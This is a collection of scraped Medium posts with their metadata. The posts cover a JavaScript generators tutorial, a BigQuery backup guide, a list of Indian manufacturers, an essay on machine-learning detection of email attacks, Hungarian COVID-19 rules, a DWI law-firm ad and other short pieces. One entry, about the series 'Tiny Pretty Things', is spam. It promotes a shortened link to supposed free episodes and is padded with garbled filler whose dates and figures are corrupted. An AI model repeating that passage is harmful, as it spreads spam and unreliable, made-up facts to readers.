For instance, we can write:
function* random() {
while (true) {
yield Math.random();
}
}
We defined a random function which keeps generating random numbers as many times as we call it.
It’s paused when yield is run.
We can have an infinite loop since the loop only runs when we run the returned generator explicitly.
To use it, we can write:
const ran = random();
console.log(ran.next());
console.log(ran.next());
Then we get something like:
{value: 0.6168149388512836, done: false}
{value: 0.7733643240483823, done: false}
We called our generator function and the call next on the returned generator ran .
Also, we can create an iterator object to return a an array of numbers sequentially.
For instance, we can write:
const obj = {
*[Symbol.iterator]() {
const arr = [1, 2, 3];
for (const a of arr) {
yield a;
}
}
}
We have the Symbol.iterator method, which is a generator function that yields each item of arr .
It’s paused when yield is run.
Then we can use it with a for-of loop by running:
for (const o of obj) {
console.log(o);
}
The async function is a special type of generator.
It produces a promise when it’s called, which is resolved or rejected.
When it yields or awaits a promise, the result of the promise or the exception value is the result of the await expression.
Event Loop
Async programs are run a piece by piece.
Each piece may start some action and schedule code to be run when an action finishes or fails.
The program sits idle in between the pieces.
Async actions happen on its own call stack.
This is why we need promises to manage async actions so that they run one by one.
JavaScript and the Browser
JavaScript is used to build almost all browser apps.
Browser users the HTTP protocol to communicate with the Internet.
HTTP stands for Hypertext Transfer Protocol.
Every time we run something in the browser, we make an HTTP request.
We make them download web pages, send data to servers, and many more.
The Transmission Control Protocol (TCP) is a protocol is the common protocol of the Internet.
It lets computers communicate with each other by having one computer listen to data and one computer sending it.
Each listener has a port number associated with it.
If we want to send emails, we use the SMTP protocol, which communicates through port 25.
We have a 2-way pipe for communication. One piece of data can flow from one computer to the other.
The Web
The browser communicates via the world wide web, known as the web for short.
We can communicate on the web by putting our computer on the Internet and listen to port 80 so we can communicate with HTTP.
For instance, we can make a request to http://example.com , which is a URL that tells us where to make the request to.
A URL is just a piece of text in a fixed format to let us locate the resources that we need.
The URL first has the protocol, which is http , then the server name, which is example.com .
It can also have a path, like http://example.com/foo.html . foo.html is the path in the URL.
Photo by Nicolas Picard on Unsplash
HTML
HTML stands for the Hypertext Markup Language.
It’s the document format for storing web pages.
It contains text and tags that we can use to give structure to the text.
We use it to describe links, paragraphs, headings, and more.
For instance, we may write:
<!doctype html>
<html> <head>
<meta charset="utf-8">
<title>hello</title>
</head> <body>
<h1>Hello</h1>
<p>Read my work
<a href="http://example.com">here</a>.</p>
</body> </html>
All HTML documents start with <!doctype html> to indicate that it’s an HTML document.
Then they have the head tag which has some metadata like the title and meta tags with extra metadata.
The body tag has the main content.
It has heading tags like h1 and p tag for paragraphs and a tag for links to other pages.
We can change HTML with JavaScript dynamically.
Conclusion
We can create generators to create functions that can be paused and resumed.
JavaScript is useful for creating web apps. They communicate via HTTP, which communicates over TCP.
JavaScript In Plain English
Enjoyed this article? If so, get more similar content by subscribing to our YouTube channel!
|
https://medium.com/javascript-in-plain-english/javascript-basics-generators-and-the-web-f30f0a1d2602
|
['John Au-Yeung']
|
2020-06-16 21:45:03.330000+00:00
|
['Technology', 'JavaScript', 'Software Development', 'Programming', 'Web Development']
|
Swipe Right for the Moon
|
Something strange happened on the way to the moon.
The technology kept getting better. And the people started getting worse.
To see what I mean, let’s begin with Buzz Aldrin. This was his background before leaving for the moon in 1969:
2,200 hours flying fighter jets
engineering degree from West Point
doctorate in science from MIT
6 years of rigorous training at NASA
Now let’s look at Yusaku Maezawa, who will be the next person visiting the moon in 2023:
graduated from high school
played drums in a punk rock band
made billions selling shoes and handbags online
And then there’s this.
Earlier this year, Maezawa decided a trip to the moon could help him find a girlfriend. So he announced a seat was open for someone who was single, over 20 and had a ‘bright personality.’
About 28,000 women applied.
But maybe Elon Musk didn’t like the idea of SpaceX being used to trawl for dates, because Mawzawa later scrapped the idea.
Whatever happened, this is where we seem to be going today. We started at “one giant leap for mankind” and ended up as an episode of The Bachelor.
Sadly, it was always going to turn out this way.
|
https://medium.com/predict/swipe-right-for-the-moon-1887ff8f22a4
|
['Craig Brett']
|
2020-10-07 00:17:20.480000+00:00
|
['Future', 'Space', 'Science', 'Technology', 'Life']
|
How to Fight Texas DWI Charges
|
How to Fight Texas DWI Charges
There are numerous direct and collateral consequences if you are convicted of a DWI, which may include jail time, ignition interlock, driver’s license suspension, and many others. It can affect your career and family for years. Soyars & Morgan Law Dec 16, 2020·3 min read
The Texas Legislature has given many citizens no other choice but to set their case for trial and the majority of cases sitting on the jury trial docket in County Courts are DWI’s. Texas does not have the resources to prosecute so many cases, which means that if you are persistent and patient, you could take advantage of Texas’ DWI case overload. So be smart about your situation and make sure you act quickly — the best Texas DWI defense can be developed by taking advantage of the Administrative License Revocation Hearing (ARL).
While some DWI’s may be eligible for deferred adjudication in Texas, this plea may not be your best outcome. Any type of plea on a Texas DWI will mean the arrest will permanently be on your criminal record and can never be expunged.
If you’ve been arrested, you need an attorney that’s going to fight for you. You need the team at Soyars & Morgan Law!
Our innovative, aggressive attorneys think outside of the box to solve your problems.
ARRESTED FOR A DWI?
|
https://medium.com/@soyarsmorganlaw/how-to-fight-texas-dwi-charges-2e114c614b22
|
['Soyars', 'Morgan Law']
|
2020-12-16 22:11:34.887000+00:00
|
['Dwi', 'Dwi Lawyer San Antonio', 'Dwi Lawyer', 'Defense Lawyer', 'Texas']
|
Pati
|
Bhavna Narula, 2021.
Thank you so much Tree Langdon for tagging me for this wonderful challenge. I thoroughly enjoyed taking this yet another time after being tagged by Agnes Laurens. Selecting one word is so difficult in itself but it's a fun thing too. I hope to have such interesting challenges coming my way in the future too.
Have a blessed New Year everyone.
|
https://medium.com/illumination/pati-ad744b21bf05
|
['Bhavna Narula']
|
2021-01-02 09:05:45.118000+00:00
|
['Humor', 'Poetry', 'Husband', 'Marriage', 'Poetry On Medium']
|
How to backup a BigQuery table (or dataset) to Google Cloud Storage and restore from it
|
How to backup a BigQuery table (or dataset) to Google Cloud Storage and restore from it
BigQuery is fully managed and takes care of managing redundant backups in storage. It also supports “time-travel”, the ability to query a snapshot as of a day ago. So, if an ETL job goes bad and you want to revert back to yesterday’s data, you can simply do:
CREATE OR REPLACE TABLE dataset.table_restored
AS
SELECT *
FROM dataset.table
FOR SYSTEM TIME AS OF
TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL -1 DAY)
However, time travel is restricted to 7 days. There are situations (playback, regulatory compliance, etc.) when you might need to restore a table as it existed 30 days ago or 1 year ago.
Python scripts to backup and restore
For your convenience, I’ve put together a pair of Python programs for backing up and restoring BigQuery tables and datasets. Get them from this GitHub repository: https://github.com/GoogleCloudPlatform/bigquery-oreilly-book/tree/master/blogs/bigquery_backup
Here’s how you use the scripts:
To backup a table to GCS
./bq_backup.py --input dataset.tablename --output gs://BUCKET/backup
The script saves a schema.json, a tabledef.json, and extracted data in AVRO format to GCS.
You can also backup all the tables in a data set:
./bq_backup.py --input dataset --output gs://BUCKET/backup
Restore tables one-by-one by specifying a destination data set
./bq_restore.py --input gs://BUCKET/backup/fromdataset/fromtable --output destdataset
How the Python scripts work
The scripts use the BigQuery command-line utility bq to put together a backup and restore solution.
bq_backup.py invokes the following commands:
bq show --schema dataset.table. # schema.json
bq --format=json show dataset.table. # tbldef.json
bq extract --destination_format=AVRO \
dataset.table gs://.../data_*.avro # AVRO files
It saves the JSON files to Google Cloud Storage alongside the AVRO files.
bq_restore.py uses the table definition to find characteristics such as whether the table is time-partitioned, range-partitioned, or clustered and then invokes the command:
bq load --source_format=AVRO \
--time_partitioning_expiration ... \
--time_partitioning_field ... \
--time_partitioning_type ... \
--clustering_fields ... \
--schema ... \
todataset.table_name \
gs://.../data_*.avro
In the case of views, the scripts store and restore the view definition. The view definition is part of the table definition JSON, and to restore it, the script simply needs to invoke:
bq mk --view query --nouse_legacy_sql todataset.table_name
Enjoy!
1. Do you need to backup to Google Cloud Storage?
After I published this article, Antoine Cas responded on Twitter:
He’s absolutely right. This article assumes that you want a backup in the form of files on Cloud Storage. This might be because your compliance auditor wants the data to be exported out to some specific location, or it might be because you want the backups to be processable by other tools.
If you do not need the backup to be in the form of files, a much simpler way to backup your BigQuery table is use bq cp to create/restore the backup:
# backup
date=...
bq mk dataset_${date}
bq cp dataset.table dataset_${date}.table # restore
bq cp dataset_20200301.table dataset_restore.table
2. Are the backup files compressed?
Yes! The data is stored in Avro format, and the Avro format employs compression. The two JSON files (table definition and schema) are not compressed, but those are relatively tiny.
As an example, I backed up a BigQuery table with 400 million rows that took 11.1 GB in BigQuery. When storing it as Avro on GCS, the same table was saved as 47 files each of which was 174.2 MB, so 8.2 GB. The two JSON files occupied a total of 1.3 MB, essentially just roundoff. This makes sense because the BigQuery storage is optimized for interactive querying whereas the Avro format is not.
3. Can you actually roundtrip from BigQuery to Avro and back?
BigQuery can export most primitive types and nested and repeated fields into Avro. For full details on the Avro representation, please see the documentation. The backup tool specifies use_avro_logical_types, so DATE and TIME are stored as date and time-micros respectively.
That said, you should verify that the backup/restore works on your table.
|
https://medium.com/google-cloud/how-to-backup-a-bigquery-table-or-dataset-to-google-cloud-storage-and-restore-from-it-6ef7eb322c6d
|
['Lak Lakshmanan']
|
2020-03-23 16:56:40.031000+00:00
|
['Cicd', 'Google Cloud Platform', 'Sql', 'Bigquery', 'Backup']
|
List of Manufacturing Companies in India
|
Manufacturing companies in India are the biggest driver of growth in India. With likes of TVS Motors, Hero Honda, Maruti, Apollo Tyres, Hindustan Unilever, Larsen & Toubro and other companies in this space, the manufacturing sector in India has spurred a technology revolution.
Manufacturing has been a significant contributor to the Indian economy. The manufacturing sector in India grew at 5% of CAGR value in Financial year 2020 as per the Government of India statistics. The manufacturing sector contribution to the Gross value add i.e GVA was US$ 397.14 billion in year 2021. (Source — IBEF)
The total foreign direct investments received by the manufacturing sector in India in April 2020 to March 2020 was US$ 89.40 billion. Government of India increased FDI in defence manufacturing under the automatic route from 49% to 74% during May 2020.
There are more than 6,80,000+ manufacturing companies in India and over 10,00,000+ manufacturing companies in United States.
The top 10 manufacturing companies in India are following:
Ashok Leyland
Hero Honda Motors
Bajaj Auto
Maruti Suzuki Limited
Mahindra & Mahindra Limited
Larsent & Toubro Limited
Godrej Group
Dabur India Limited
Hindustan Unilever Limited
Apollo Tyres
Let’s have a look at the manufacturing companies in India with their key decision-maker contact information.
Daimler India Commercial Vehicles
Industry: Automotive
Number of employees : 1001–5000
Location : Chennai, Tamil Nadu
Daimler India Comercial Vehicles is a Automotive company and has headquarters in Chennai, Tamil Nadu. Daimler India Comercial Vehicles has 1001–5000 employees. Daimler India Comercial Vehicles was founded in 2009. Daimler India Comercial Vehicles is a privately held company.
Cochin Shipyard Limited
Industry : Shipbuilding
Number of employees : 1001–5000
Location : Kochi, Kerala
Cochin Shipyard Limited is a Shipbuilding company and has headquarters in Kochi, Kerala. Cochin Shipyard Limited has 1001–5000 employees.
Wipro Consumer Care And Lighting
Industry : Consumer Goods
Number of employees : 1001–5000
Location : Bangalore, India
Wipro Consumer Care And Lighting is a Consumer Goods company and has headquarters in . Wipro Consumer Care And Lighting has 1001–5000 employees. Wipro Consumer Care And Lighting was founded in 1945. Wipro Consumer Care And Lighting is a privately held company. Wipro Consumer Care And Lighting is founded by Vineet Agrawal. CEO of Wipro Consumer Care And Lighting is Vineet Agrawal.
Emami Limited
Industry : Consumer Goods
Number of employees : 1001–5000
Location : Kolkata, West Bengal, India
Emami Limited is a Consumer Goods company and has headquarters in Kolkata, West Bengal, India. Emami Limited has 1001–5000 employees. Emami Limited specialises in manufacturing. Emami Limited was founded in 1974. Emami Limited is a public company.
Apollo Tyres
Limited Industry : Automotive
Number of employees : 5001–10,000
Location : Gurgaon, Haryana, India
Apollo Tyres Limited is a Automotive company and has headquarters in Gurgaon, Haryana, India. Apollo Tyres Limited has 5001–10,000 employees. Apollo Tyres Limited specialises in manufacturing. Apollo Tyres Limited was founded in 1972. Apollo Tyres Limited is founded by Onkar Singh Kanwar. CEO of Apollo Tyres Limited is Neeraj Kanwar.
Hindustan Unilever Limited
Industry : Consumer Goods
Number of employees : 10,001+
Location : Mumbai, Maharashtra
Hindustan Unilever Limited is a Consumer Goods company and has headquarters in Mumbai, Maharashtra. Hindustan Unilever Limited has 10,001+ employees. Hindustan Unilever Limited was founded in 1933. Hindustan Unilever Limited is a public. Hindustan Unilever Limited is founded by Lever Brothers. CEO of Hindustan Unilever Limited is Sanjiv Mehta.
For the complete list of manufacturing companies in India, you may check this link.
This article originally published on EasyLeadz.
Footnotes
List of Manufacturing Companies in India | Top Manufacturing Companies in India
|
https://medium.com/@nitinbajaj-1423/list-of-manufacturing-companies-in-india-cf85b8d991e1
|
['Nitin Bajaj']
|
2021-03-19 08:41:18.272000+00:00
|
['Lists', 'Marketing', 'B2B', 'Sales', 'Companies In India']
|
Statusでのステッカー販売方法とルールについて
|
Learn more. Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more
Make Medium yours. Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore
|
https://medium.com/status-japan/status%E3%81%A7%E3%81%AE%E3%82%B9%E3%83%86%E3%83%83%E3%82%AB%E3%83%BC%E8%B2%A9%E5%A3%B2%E6%96%B9%E6%B3%95%E3%81%A8%E3%83%AB%E3%83%BC%E3%83%AB%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6-a3f85e91782c
|
['We Are Status Japanese']
|
2020-12-21 16:32:19.339000+00:00
|
['Status', 'Stickers', 'Japan']
|
Combining ML Models to Detect Email Attacks
|
This article is a follow-up to one I wrote a year ago — Lessons from building AI to Stop Cyberattacks — in which I discussed the overall problem of detecting social engineering attacks using ML techniques and our general solution at Abnormal. This post aims to walk through the process we use at Abnormal to model various aspects of a given email and ultimately detect and block attacks.
As discussed in the previous post, sophisticated social engineering email attacks are on the rise and getting more advanced every day. They prey on the trust we put in our business tools and social networks, especially when a message appears to be from someone on our contact list (but is not) or even more insidiously when the attack is actually from a contact whose account has been compromised. The FBI estimates that over the past few years over 75% of cyberattacks start with social engineering, usually through email.
Why is this a hard ML problem?
A needle in a haystack — The first challenge is that the base rate is very low. Advanced attacks are rare in comparison to the overall volume of legitimate email:
1 in 100,000 emails is advanced spear-phishing
less than 1 in 10,000,000 emails is advanced BEC (like invoice fraud) or lateral spear phishing (a compromised account phishing another employee)
When compared to spam, which accounts for 65 in every 100 emails, we have an extremely biased classification problem which raises all sorts of difficulties
Enormous amounts of data — At the same time, the data we have is large (many terabytes), messy, multi-modal, and difficult to collect and serve at low latency for a real-time system. For example, features that an ML system would want to evaluate include:
Text of the email
Metadata and headers
History of communication for parties involved, geo locations, IPs, etc
Account sign-ins, mail filters, browsers used
Content of all attachments
Content of all links and the landing pages those links lead to
…and so much more
Turning all this data into useful features for a detection system is a huge challenge from a data engineering as well as ML point of view.
Adversarial attackers — To make matters worse, attackers actively manipulate the data to make it hard on ML models, constantly improving their techniques and developing entirely new strategies.
The precision must be very high — to build a product to prevent email attacks we must avoid false positives and disruption of legitimate business communications, but at the same time catch every attack. The false-positive rate needs to be as low as one in a million!
For more examples of the challenges that go into building ML to stop email attacks, see the discussion Lessons from building AI to Stop Cyberattacks.
To effectively solve this problem we must be diligent and extremely thoughtful about how we break down the overall detection problem into components that are solved carefully.
Example:
Let’s start with this hypothetical email attack and imagine how we could model various dimensions and how those models come together.
Subject: Reset your password
From: Microsoft Support <[email protected]>
Content: “Please click _here_ to reset the password to your account.”
This is a simple and prototypical phishing attack.
As with any well-crafted social engineering attack, it appears nearly identical to a legitimate message, in this case, a legitimate password reset message from Microsoft. Because of this, modeling any single dimension of this message will be fruitless for classification purposes. Instead, we need break up the problem into component sub-problems
Thinking like the attacker
Our first step is always to put ourselves in the mind of the attacker. To do so we break an attack down into what we call “attack facets”.
Attack Facets:
Attack Goal — What is the attacker trying to accomplish? Steal money? Steal credentials? Etc. Impersonation Strategy — How is the attacker building credibility with the recipient? Are they impersonating someone? Are they sending from a compromised account? Impersonated Party — Who is being impersonated? A trusted brand? A known vendor? The CEO of a company? Payload Vector — How is the actual attack delivered? A link? An Attachment?
If we break down the Microsoft password reset example, we have:
Attack goal: Steal a user's credentials Impersonation strategy: Impersonate a brand through a lookalike display name (Microsoft) Impersonated party: The official Microsoft brand Payload vector: A link to a fake login page.
Modeling the problem
Building ML models to solve a problem with such a low base rate and precisions requirements forces a high degree of diligence when modeling sub-problems and feature engineering. We cannot rely just on the magic of ML.
In the last section, we described a way to break an attack into components. We can use that same breakdown to help inspire the type of information we would like to model about an email in order to determine if it is an attack.
All these models rely on similar underlying techniques — specifically
Behavior modeling: identifying abnormal behavior by modeling normal communication patterns and finding outliers from that
identifying abnormal behavior by modeling normal communication patterns and finding outliers from that Content modeling: understanding the content of an email
understanding the content of an email Identify resolution: matching the identity of individuals and organizations referenced in an email (perhaps in an obfuscated way) to a database of these entities
Attack Goal and Payload
Identifying an attack goal requires modeling the content of a message. We must understand what is being said. Is the email asking the recipient to do anything? Is it an urgent tone? and so forth. This model may not only identify malicious content but safe content as well in order to differentiate the two.
Impersonated Party
What does an impersonation look like? First of all the email must appear to the recipient to look like someone they trust. We build identity models to match various parts of an email against known entities inside and outside an organization. For example, we may identify an employee impersonation by matching against the active directory. We may identify a brand impersonation by matching against the known patterns of brand-originating emails. We might identify a vendor impersonation by matching against our vendor database.
Impersonation Strategy
An impersonation happens when an email is not from the entity it is claiming to be from. To do so we identify normal behavior patterns to spot these abnormal ones. This may be abnormal behavior between the recipient and the sender. It may be unusual sending patterns from the sender. In the simplest case, like the example above, we can simply note that Microsoft never sends from “fakemicrosoft.com”. In more difficult cases, like account takeover and vendor compromise, we must look at more subtle clues like unusual geo-location and IP address of the sender or incorrect authentication (for spoofs).
Attack Payload
For the payload, we must understand the content of attachments and links. Modeling these requires a combination of NLP models, computer vision models to identify logos, URL models to identify suspicious links, and so forth.
Modeling each of these dimensions gives our system an understanding of emails particularly along dimensions that might be used by attackers to conduct social engineering attacks. The next step is actually detecting attacks
Combining Models to Detect Attacks
Ultimately we need to combine these sub-models to produce a classification result (for example P(Attack)). Just like any ML problem, the features given to a classifier are crucial for good performance. The careful modeling described above gives us very high bandwidth features. We can combine these models in a few possible ways.
(1) One humongous classification model: Train a single classifier with all the inputs available to each sub-model. All the input features could be chosen based on the features that worked well within each sub-problem, but this final model combines everything and learns unique combinations and relationships.
(2) Extract features from sub-models and combine to predict target — there are 3 ways we can go about this:
(2.a) Ensemble of Models-as-Features: Each sub-model is a feature. Its output is dependent on the type of model. For example, a content model might predict a vector of binary topic features
(2.b) Ensemble of Classifiers: Build sub-classifiers that each predict some target and combine them using some kind of ensemble model or set of rules. For example, a content classifier would predict the probability of attack given the content alone.
(2.c) Embeddings: Each sub-model is trained to predict P(attack) like above or some other supervised or unsupervised target, but rather than combining their predictions, we extract embeddings, for example, by taking the penultimate layer of a neural net.
Each of the above approaches has advantages and disadvantages. Training one humongous model has the advantage of getting to learn all complex cross dependencies, but it is harder to understand and harder to debug, and more prone to overfitting. It also requires all the data available in one shot, unlike building sub-models that could potentially operate on disparate datasets.
The various methods of extracting features from sub-models also have tradeoffs. Training sub-classifiers is useful because they are very interpretable (for example we could have a signal that represents the suspiciousness of text content alone), but in some cases, it is difficult to predict the attack target directly from a sub-domain of data. For example, purely a rare communication pattern is not sufficient to slice the space meaningfully to predict an attack. Similarly as discussed above, a pure content model cannot predict an attack without context regarding the communication pattern. The embeddings approach is good, but also finicky, it is important to vet your embeddings and not just trust they will work. Also, the embedding approach is more prone to overfitting or accidental label leakage.
Most importantly with all these approaches, it is crucial to think deeply about all the data going into models and also the actual distribution of outputs. Blindly trusting in the black box of ML is rarely a good idea. Careful modeling and feature engineering are necessary, especially when it comes to the inputs to each of the sub-models.
Our solution at Abnormal
As a fast-growing startup, we originally had a very small ML team which has been growing quickly over the past year. With the growth of the team, we also have adapted our approach to modeling, feature engineering, and training our classifiers. At first, it was easiest to just focus on one large model that combined features carefully engineered to solve subproblems. However, as we’ve added more team members it has become important to split the problem up into various components that can be developed simultaneously.
Our current solution is a combination of all the above approaches depending on the particular sub-model. We still use a large monolithic model as one signal, but our best models use a combination of inputs including embeddings representing an aspect of an email and prediction values from sub-classifiers (for example a suspicious URL score).
Combining models and managing feature dependencies and versioning is also difficult.
Takeaways for solving other ML problems
Deeply understand your domain Carefully engineer features and sub-models, don’t trust black box ML Solving many sub-problems and combining them for a classifier works well, but don’t be dogmatic. Sure, embeddings may be the purest solution, but if it’s simpler to just create a sub-classifier or good set of features, start with that. Breaking up a problem also allows scaling a team. If multiple ML engineers are working on a single problem, they must necessarily focus on separate components. Modeling a problem as a combination of subproblems also helps with explainability. It’s easier to debug a text model than a giant multi-modal neural net.
But, there’s a ton more to do!
We need to figure out a more general pattern for developing good embeddings and better ways of modeling sub-parts of the problem, better data platforms, and feature engineering tools, and so much more. Attacks are constantly evolving and our client base is ever-growing leading to tons of new challenges every day. If these problems interest you, yes, we’re hiring!
|
https://medium.com/abnormal-security-engineering-blog/combining-ml-models-to-detect-email-attacks-e1b4d1f2d14e
|
['Jeshua Bratman']
|
2020-11-18 00:21:27.244000+00:00
|
['Machine Learning', 'Email Security', 'Artificial Intelligence', 'Cybersecurity', 'Data Science']
|
The second phase of protective measures
|
The Government declares a state of danger in the entire territory of Hungary on the 4th of November 2020. Because of the massive disease outbreak, the Government issued new regulations for the protection of the people’s health and lives. You can find the new life changing measures in the following:
CURFEW
Between 8 p.m. and 5 a.m. you have to be at home or at your current accommodation. In case in this time interval the police or the Hungarian defense force member finds you in the streets the police may impose a fine ranging from HUF 100 000 to HUF 1 000 000. Against this decision you cannot lie an appeal.
There are a few exceptions when you allowed to leave your residence:
in a situation endangering health or life or threatening serious damage
for performing work
for travelling to your place of work, and for travelling from your place of work to your place of residence
participating in a training or sports competition held for a competitive athlete within the meaning of the Act on sports
In the mentioned cases you have to present a certification that allows you to stay in a public place.
At the link below you can download the required employer’s certification in Hungarian. The document must be undersigned by your employer. If you need any help in this regard, please don’t hesitate to contact us.
The Government also made an exception for the dog owners, they can leave their accommodation between 8 p.m. and 5 a.m. for dog walking. If you don’t know the exact distance, at this website below you can search the area where you can walk with your dog without get a fine.
FAMILY GATHERINGS
With the exception of marriage and funerals, family gatherings and private events may be held only if the number of persons present at the same time does not exceed ten. The number of persons present at a funeral shall not exceed fifty.
ACCOMODATION ESTABLISHMENTS
With the exceptions of those who arriving to engage in business, economic or education activities, staying at an accommodation establishment shall be forbidden.
CATERING FACILITIES
Staying in a catering facility shall be forbidden except for those employed there and those who pick up and deliver food for take-away.
STORES
With the exception of those employed there, staying in a store, in a lottery store, and in a national tobacco shop shall be forbidden between 7 p.m. and 5 a.m. These stores can be open only during this time of the day.
In the above-mentioned places, the operator or manager is obliged to ensure the protective measures. If the police find the operation illegal, they may temporarily close the place for a period less than a day, or even for 1 year. The police can impose this sanction together with a fine.
EDUCATION INSTITUTIONS
Nurseries, kindergartens and primary schools up to the 8th grade allowed to be open.
Secondary schools from 9th grade shall operate in digital working arrangements.
In higher education institution the education takes place in digital form.
|
https://medium.com/enterhungary/the-second-phase-f74b474e604d
|
[]
|
2020-12-15 14:09:22.497000+00:00
|
['Regulation', 'Curfew', 'Hungary', 'Covid 19']
|
¿Quiénes votaron la IVE?
|
Learn more. Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more
Make Medium yours. Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore
|
https://medium.com/factor-data/qui%C3%A9nes-votaron-la-ive-d5814e857b6c
|
['Adriana Chazarreta']
|
2020-12-18 15:28:02.936000+00:00
|
['Logistic Regression', 'Vote', 'Computational Sociology', 'Sociology', 'Argentina']
|
[1x6] Watch Tiny Pretty Things Season 1 Episode 6 Full Episode Online Full HD
|
New Episode — Tiny Pretty Things Season 1 Episode 6 (Full Episode) Top Show
Official Partners Netflix TV Shows & Movies Full Series Online
NEW EPISODE PREPARED ►► https://tinyurl.com/y444jwfa
🌀 All Episodes of “Tiny Pretty Things” 01x06 : Episode 6 Happy Watching 🌀
Tiny Pretty Things
Tiny Pretty Things 1x6
Tiny Pretty Things S1E6
Tiny Pretty Things Cast
Tiny Pretty Things Netflix
Tiny Pretty Things Season 1
Tiny Pretty Things Episode 6
Tiny Pretty Things Season 1 Episode 6
Tiny Pretty Things Full Show
Tiny Pretty Things Full Streaming
Tiny Pretty Things Download HD
Tiny Pretty Things Online
Tiny Pretty Things Full Episode
Tiny Pretty Things Finale
Tiny Pretty Things All Subtitle
Tiny Pretty Things Season 1 Episode 6 Online
🦋 TELEVISION 🦋
(TV), in some cases abbreviated to tele or television, is a media transmission medium utilized for sending moving pictures in monochrome (high contrast), or in shading, and in a few measurements and sound. The term can allude to a TV, a TV program, or the vehicle of TV transmission. TV is a mass mode for promoting, amusement, news, and sports.
TV opened up in unrefined exploratory structures in the last part of the 191s, however it would at present be quite a while before the new innovation would be promoted to customers. After World War II, an improved type of highly contrasting TV broadcasting got famous in the United Kingdom and United States, and TVs got ordinary in homes, organizations, and establishments. During the 1950s, TV was the essential mechanism for affecting public opinion.[1] during the 1915s, shading broadcasting was presented in the US and most other created nations. The accessibility of different sorts of documented stockpiling media, for example, Betamax and VHS tapes, high-limit hard plate drives, DVDs, streak drives, top quality Blu-beam Disks, and cloud advanced video recorders has empowered watchers to watch pre-recorded material, for example, motion pictures — at home individually plan. For some reasons, particularly the accommodation of distant recovery, the capacity of TV and video programming currently happens on the cloud, (for example, the video on request administration by Netflix). Toward the finish of the main decade of the 150s, advanced TV transmissions incredibly expanded in ubiquity. Another improvement was the move from standard-definition TV (SDTV) (531i, with 909093 intertwined lines of goal and 434545) to top quality TV (HDTV), which gives a goal that is generously higher. HDTV might be communicated in different arrangements: 3451513, 3451513 and 3334. Since 115, with the creation of brilliant TV, Internet TV has expanded the accessibility of TV projects and films by means of the Internet through real time video administrations, for example, Netflix, HBO Video, iPlayer and Hulu.
In 113, 39% of the world’s family units possessed a TV set.[3] The substitution of early cumbersome, high-voltage cathode beam tube (CRT) screen shows with smaller, vitality effective, level board elective advancements, for example, LCDs (both fluorescent-illuminated and LED), OLED showcases, and plasma shows was an equipment transformation that started with PC screens in the last part of the 1990s. Most TV sets sold during the 150s were level board, primarily LEDs. Significant makers reported the stopping of CRT, DLP, plasma, and even fluorescent-illuminated LCDs by the mid-115s.[3][4] sooner rather than later, LEDs are required to be step by step supplanted by OLEDs.[5] Also, significant makers have declared that they will progressively create shrewd TVs during the 115s.[1][3][8] Smart TVs with incorporated Internet and Web 3.0 capacities turned into the prevailing type of TV by the late 115s.[9]
TV signals were at first circulated distinctly as earthbound TV utilizing powerful radio-recurrence transmitters to communicate the sign to singular TV inputs. Then again TV signals are appropriated by coaxial link or optical fiber, satellite frameworks and, since the 150s by means of the Internet. Until the mid 150s, these were sent as simple signs, yet a progress to advanced TV is relied upon to be finished worldwide by the last part of the 115s. A standard TV is made out of numerous inner electronic circuits, including a tuner for getting and deciphering broadcast signals. A visual showcase gadget which does not have a tuner is accurately called a video screen as opposed to a TV.
🦋 OVERVIEW 🦋
A subgenre that joins the sentiment type with parody, zeroing in on at least two people since they find and endeavor to deal with their sentimental love, attractions to each other. The cliché plot line follows the “kid gets-young lady”, “kid loses-young lady”, “kid gets young lady back once more” grouping. Normally, there are multitudinous variations to this plot (and new curves, for example, switching the sex parts in the story), and far of the by and large happy parody lies in the social cooperations and sexual strain between your characters, who every now and again either won’t concede they are pulled in to each other or must deal with others’ interfering inside their issues.
Regularly carefully thought as an artistic sort or structure, however utilized it is additionally found in the realistic and performing expressions. In parody, human or individual indecencies, indiscretions, misuses, or deficiencies are composed to rebuff by methods for scorn, disparagement, vaudeville, incongruity, or different strategies, preferably with the plan to impact an aftereffect of progress. Parody is by and large intended to be interesting, yet its motivation isn’t generally humor as an assault on something the essayist objects to, utilizing mind. A typical, nearly characterizing highlight of parody is its solid vein of incongruity or mockery, yet spoof, vaudeville, distortion, juxtaposition, correlation, similarity, and risqué statement all regularly show up in ironical discourse and composing. The key point, is that “in parody, incongruity is aggressor.” This “assailant incongruity” (or mockery) frequently claims to favor (or if nothing else acknowledge as common) the very things the humorist really wishes to assault.
In the wake of calling Zed and his Blackblood confidants to spare Tiny Pretty Things, Talon winds up sold out by her own sort and battles to accommodate her human companions and her Blackblood legacy. With the satanic Lu Qiri giving the muscle to uphold Zed’s ground breaking strategy, Tiny Pretty Things’s human occupants are subjugated as excavators looking for a baffling substance to illuminate a dull conundrum. As Talon finds more about her lost family from Yavalla, she should sort out the certainties from the falsehoods, and explain the riddle of her legacy and an overlooked force, before the world becomes subjugated to another force that could devour each living being.
Claw is the solitary overcomer of a race called Blackbloods. A long time after her whole town is annihilated by a pack of merciless hired soldiers, Talon goes to an untamed post on the edge of the enlightened world, as she tracks the huggers of her family. On her excursion to this station, Talon finds she has a strange heavenly force that she should figure out how to control so as to spare herself, and guard the world against an over the top strict tyrant.
|
https://medium.com/@tiny-pretty-things-s1-all/s1-ep6-tiny-pretty-things-series-1-episode-6-hd-720p-online-3bfc4165e02e
|
['Tiny Pretty Things All']
|
2020-12-14 06:13:24.529000+00:00
|
['TV Series', 'Drama', 'Mystery', 'Startup', 'Thriller']
|
There has been a lot of talk lately about making your ETH2 staking setups failure ‘proof’.
|
There has been a lot of talk lately about making your ETH2 staking setups failure ‘proof’. But what are the failure cases in ETH2 to worry about? And how can I figure out which are reasonable or worthwhile to have mitigation solutions in place?
A good starter
As a good starter I recommend to read this great article recently published by Carl Beekhuize from the EF. In the following post I ‘d like to add some color to Carl’s points here and there.
